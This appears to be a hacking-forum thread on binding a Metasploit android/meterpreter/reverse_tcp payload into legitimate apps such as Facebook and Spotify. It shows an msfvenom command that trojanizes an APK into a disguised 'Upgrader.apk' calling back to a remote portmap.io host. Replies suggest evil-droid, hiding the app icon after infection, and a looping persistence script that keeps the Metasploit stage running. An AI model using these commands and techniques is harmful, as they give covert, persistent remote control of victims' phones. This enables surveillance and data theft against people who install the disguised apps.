Forum Thread: How We Can Set a reverse_tcp Payload for Android in Any Apk File?

I've tried so many time to set a reverse_tcp payload in an apk file , I installed every software that showed in error For example : Javanese, Keytool, apktook, zipalign and jar-signer ,

command I used :-{msfvenom -x facebook.apk --arch dalvik --platform Android android/meterpreter/reverse_tcp LHOST="XXXXX.portmap.io" LPORT=XXXX R -o Upgrader.apk} ,

error showed :- {Attempting to read payload from STDIN...
No encoder or badchars specified, outputting raw payload
Payload size: 0 bytes
Saved as: Upgrader.apk}.

Please help!

8 Responses

Try out this command here

Will this bind my payload in an apk file, for example : spotify.apk ?

Nope this aint't going to bind your reverse payload into a real working .apk file it just going to generate a standalone payload

you could clone evil-droid.

either create a msf payload changing the name and icon. this is the best I think when you get meterpreter you could use hideappicon command which will give you time to upload a persistence script

or
you could backdoor a existing apk - best option use the google.now laucher
the link to download google-now-launcher.en.softonic.com/android

I tried this but persistence file is not executing.

I gave the command in shell : sh (file name).sh

And I think it's correct if not then please tell, or else maybe there is something wrong in my persistence file.

Can you share that persistence file? Or teach me how to make. Is there different persistence files for every version of Android?

i will also be helpful if you share the error youre receiving when you run the .sh script

here what i notice when backdooring a existing apk

example when you installed whatapp if you check in the android/data folder it willl be installed as com.whatsapp. i find that when you backdoor a apk you will not find that a com.metasploit.stage exist, correct me if im wrong plz.

anyways

because of how most android application are programmed today it is very unlikely that most of them will be recompiled sucessfully with apktool. i havent testing your app to see if it would recompile sucessfully but the best option i found was the google now launcher. apk(source hackersploit on youtube).

anyways here's my persistence.sh script for the normal metasploit payload (without backdooring)

#!/bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

as i say if it dont work it means that com.metasploit.stage does not exist

the best option is to just create a normal payload with evil-droid and then add an icon to it. when you get meterpreter hide the icon and run the persistence script. installed the payload on your android first to get the com.blaa.blaa then edit the persistence.sh file

while true
do am start --user 0 -a android.intent.action.MAIN -n com.blaa.blaa/.MainActivity
sleep 20
done

check out my other post: on how to run the persistence script without enter android shell from meterpreter throught the (shell )cmd .

Yes, I tried all you told, binding payload into Google Now launcher is working but binding with other like : (spotify.apk) or any latest apks doesn't work. And setting a persistence file also worked , thank you .

I tried in both evil-droid and askinjector. I want to learn to bind payload in spotify or lifesum or instagram or any newer versions of applications. And to specify more, I was trying in spotify. I don't want to hack anyone. There is nothing which is 100% safe, there will be always a way, I just want to know how.

Share Your Thoughts

  • Hot
  • Active